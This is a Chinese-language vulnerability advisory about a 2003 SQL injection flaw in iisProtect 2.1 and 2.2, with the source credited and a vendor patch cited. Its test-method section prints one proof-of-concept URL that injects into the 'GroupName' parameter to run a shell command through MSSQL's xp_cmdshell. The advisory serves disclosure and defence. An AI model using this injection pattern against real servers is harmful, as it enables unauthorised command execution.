发布日期：2003-05-22
更新日期：2003-05-28

受影响系统：

iisProtect iisProtect 2.2
iisProtect iisProtect 2.1

描述：

---

BUGTRAQ  ID: 7675

iisPROTECT是一款设计对WEB目录提供密码保护的程序，类似Apache中的htaccess方法，可通过WEB进行管理。

iisPROTECT对用户提交的管理请求的变量缺少充分过滤，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能以MSSQL进程权限执行任意命令。

iisPROTECT使用MS access文件或MS SQL数据库进行管理，由于对用户提交的输入缺少检查，攻击者提交恶意SQL命令注入到'GroupName'变量中，可导致以MSSQL进程权限执行任意命令(使用MS SQL数据库的情况下)，或对数据库进行破坏。

<*来源：Torben 'Gyrniff' Frohn （nn@gyrniff.dk）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105370528728225&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Torben 'Gyrniff' Frohn （nn@gyrniff.dk）提供了如下测试方法：

http://x.x.x.x/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTa \
b=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';--

建议：

---

厂商补丁：

iisProtect
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载升级到最新iisProtect版本：

http://www.iisprotect.com/

浏览次数：4019
严重程度：0（网友投票）